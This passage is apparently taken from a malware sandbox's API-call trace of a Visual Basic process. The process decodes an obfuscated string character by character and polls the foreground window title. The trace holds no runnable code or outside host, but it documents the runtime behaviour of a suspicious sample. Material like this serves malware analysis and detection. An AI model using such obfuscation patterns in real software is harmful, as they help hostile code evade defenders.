pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.902] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|", lpUsedDefaultChar=0x0) returned 1 [0088.902] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.902] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0088.902] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.903] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84", lpUsedDefaultChar=0x0) returned 1 [0088.903] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.903] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0088.903] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.904] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{", lpUsedDefaultChar=0x0) returned 1 [0088.904] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.904] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0088.904] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.904] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0088.905] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.905] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0088.905] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.905] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0088.905] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.906] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0088.906] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.906] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y", lpUsedDefaultChar=0x0) returned 1 [0088.906] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.906] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0088.906] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.907] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0088.907] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.907] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0088.907] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.908] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0088.908] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.908] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0088.908] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.908] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s", lpUsedDefaultChar=0x0) returned 1 [0088.909] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.909] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0088.909] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.909] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0088.909] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.909] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0088.910] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.910] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0088.910] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.910] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0088.910] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.911] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0088.911] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.911] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0088.911] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.911] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0088.912] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.912] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0088.912] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.912] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=", lpUsedDefaultChar=0x0) returned 1 [0088.912] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.913] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0088.913] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.913] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=", lpUsedDefaultChar=0x0) returned 1 [0088.913] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.913] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0088.914] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.914] GetForegroundWindow () returned 0x102c2 [0088.914] GetLastError () returned 0x0 [0088.914] SysStringLen (param_1=" ") returned 0xff [0088.914] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0088.914] SysStringLen (param_1=" ") returned 0xff [0088.914] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0xe577bc, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0088.914] GetWindowTextA (in: hWnd=0x102c2, lpString=0xe577bc, nMaxCount=255 | out: lpString="Activity Arrive Event") returned 21 [0088.915] GetLastError () returned 0x0 [0088.915] SysStringByteLen (bstr="捁楴楶祴䄠牲癩⁥癅湥t†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0088.915] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0088.915] SysStringByteLen (bstr="捁楴楶祴䄠牲癩⁥癅湥t†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0088.915] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=256, lpWideCharStr=0xe3bb3c, cchWideChar=511 | out: lpWideCharStr="Activity Arrive Event") returned 256 [0088.915] SysStringLen (param_1="Acti") returned 0x4 [0088.916] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Acti", cchWideChar=5, lpMultiByteStr=0xe4a94c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Acti", lpUsedDefaultChar=0x0) returned 5 [0088.916] SetWindowTextA (hWnd=0x2036e, lpString="Acti") returned 1 [0088.916] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x15 [0088.916] GetFocus () returned 0x0 [0088.916] lstrlenA (lpString="Acti") returned 4 [0088.916] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xc, wParam=0x0, lParam=0xe4a94c) returned 0x1 [0088.916] IsWindow (hWnd=0x2036e) returned 1 [0088.917] IsWindow (hWnd=0x2036e) returned 1 [0088.917] IsWindow (hWnd=0x2036e) returned 1 [0088.917] IsWindow (hWnd=0x2036e) returned 1 [0088.917] GetFocus () returned 0x0 [0088.918] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x4 [0088.918] GetFocus () returned 0x0 [0088.918] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x5) returned 0x310bcd0 [0088.918] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xd, wParam=0x5, lParam=0x310bcd0) returned 0x4 [0088.918] GetFocus () returned 0x0 [0088.918] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Acti", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0088.918] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Acti", cbMultiByte=-1, lpWideCharStr=0xe4a94c, cchWideChar=5 | out: lpWideCharStr="Acti") returned 5 [0088.918] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x310bcd0 | out: hHeap=0x30f0000) returned 1 [0088.918] VarCmp (pvarLeft=0x28f180, pvarRight=0x28f1e8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0088.919] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`", lpUsedDefaultChar=0x0) returned 1 [0088.920] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.920] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0088.920] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.922] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="†", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x86", lpUsedDefaultChar=0x0) returned 1 [0088.922] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.922] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="y", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="y") returned 1 [0088.922] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.922] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80", lpUsedDefaultChar=0x0) returned 1 [0088.923] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.923] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0088.923] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.923] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0088.924] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.924] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0088.924] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.924] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80", lpUsedDefaultChar=0x0) returned 1 [0088.925] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.925] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0088.925] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u", lpUsedDefaultChar=0x0) returned 1 [0088.925] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.926] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0088.926] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82", lpUsedDefaultChar=0x0) returned 1 [0088.926] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.926] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0088.927] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0088.927] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.927] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0088.927] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.928] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q", lpUsedDefaultChar=0x0) returned 1 [0088.928] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0088.928] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.929] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|", lpUsedDefaultChar=0x0) returned 1 [0088.929] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.929] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0088.929] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.929] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84", lpUsedDefaultChar=0x0) returned 1 [0088.930] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.930] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0088.930] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{", lpUsedDefaultChar=0x0) returned 1 [0088.930] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.931] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0088.931] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0088.931] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.931] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0088.932] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.932] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0088.932] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.932] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0088.932] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.933] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y", lpUsedDefaultChar=0x0) returned 1 [0088.933] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.933] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0088.933] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0088.934] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.934] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0088.934] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0088.935] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.935] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: 